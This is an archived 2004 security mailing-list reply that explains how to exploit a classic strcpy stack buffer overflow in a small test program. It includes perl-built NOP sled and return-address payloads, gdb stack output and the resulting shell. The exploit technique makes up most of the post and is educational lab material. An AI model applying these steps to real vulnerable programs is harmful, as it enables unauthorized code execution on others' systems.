Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Security Basics: Re: Buffer Overflow problem

Re: Buffer Overflow problem

From: Krzysztof Godlewski <kgodlewski_at_interia.pl>
Date: Fri, 7 May 2004 18:13:52 +0200

Dnia śro 5. maja 2004 08:14, John Vill napisał:
> Hello Im new to this is list and I was hoping someone can help me.
>
> int main(int argv,char **argc) {
> char buf[256];
>
> strcpy(buf,argc[1]);
> }

Hello,

The problem is incorrect padding. I'll try explaining, but keep in mind that
I'm very far from being an expert...

On my system buf has addr 0xbffff4a0. When I run the prog like this:

Starting program: /home/kg/prog/sec/buf `perl -e 'print
"\x90"x222'``./mkshell.pl``perl -e 'print "\xa0\xf4\xff\xbf"'`

I get:

Program received signal SIGSEGV, Segmentation fault.
0x00bffff4 in ?? ()

So I'm just one byte off from the correct location. Examining the stack proves
that this is true:

(gdb) x/4x $esp - 8
0xbffff5a8: 0xa068732f 0x00bffff4 0x00000002 0xbffff5f4
(gdb)

The value 0xa06873f2 just before the return addr holds the missing part of my
buffer's address. So all you have to do is move the entire address by one
byte. So...

Starting program: /home/kg/prog/sec/buf `perl -e 'print
"\x90"x223'``./mkshell.pl``perl -e 'print "\xa6\xf4\xff\xbf"'`

sh-2.05b$

.. it works.

A good idea is to write more than one return address on the stack, so you
don't have to be so exact in calculating location. You just have to remember
to jump somwhere inside the buffer. In my case, I changed the return address
to 0xbffff4a9. Now:

Starting program: /home/kg/prog/sec/buf `perl -e 'print
"\x90"x220'``./mkshell.pl``perl -e 'print "\xa9\xf4\xff\xbf"x30'`

Program received signal SIGSEGV, Segmentation fault.
0xfff4a9bf in ?? ()
(gdb)

You can see there's my address on the stack, it's just incorrectly aligned. We
can fix this by adding 1 to 3 bytes of padding:

Starting program: /home/kg/prog/sec/buf AAA`perl -e 'print
"\x90"x220'``./mkshell.pl``perl -e 'print "\xa9\xf4\xff\xbf"x30'`

sh-2.05b$

This approach is more likely to work, as it leaves more room for mistake.

I hope that helps.

Krzysztof Godlewski

---------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off
any course! All of our class sizes are guaranteed to be 10 students or less
to facilitate one-on-one interaction with one of our expert instructors.
Attend a course taught by an expert instructor with years of in-the-field
pen testing experience in our state of the art hacking lab. Master the skills
of an Ethical Hacker to better assess the security of your organization.
Visit us at:
http://www.infosecinstitute.com/courses/ethical_hacking_training.html
----------------------------------------------------------------------------
Received on May 07 2004

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]